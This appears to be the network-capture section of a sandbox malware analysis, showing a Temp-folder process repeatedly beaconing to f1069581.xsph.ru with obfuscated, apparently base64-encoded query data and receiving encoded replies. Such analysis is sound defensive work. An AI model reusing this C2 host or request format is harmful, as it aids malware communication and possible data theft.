                Jan 2, 2025 05:17:40.341936111 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:17:41.044749022 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:40 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.549906141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:17:46.058950901 CET2206OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJN [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:17:46.779894114 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:46 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.549940141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:17:51.802097082 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:17:52.626235008 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:52 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.549981141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:17:57.637072086 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:17:58.308748007 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:58 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.549987141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:18:03.347429037 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:18:04.023752928 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:18:03 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.549988141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:18:09.044888973 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:18:09.719713926 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:18:09 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                13192.168.2.549989141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:18:14.732865095 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Jan 2, 2025 05:18:15.414184093 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:18:15 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                14192.168.2.549990141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:18:20.434029102 CET2257OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:18:21.116899014 CET264INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:18:21 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 104
                Connection: keep-alive
                Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65
                Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                15192.168.2.549991141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:18:26.137350082 CET2233OUTGET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED]
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
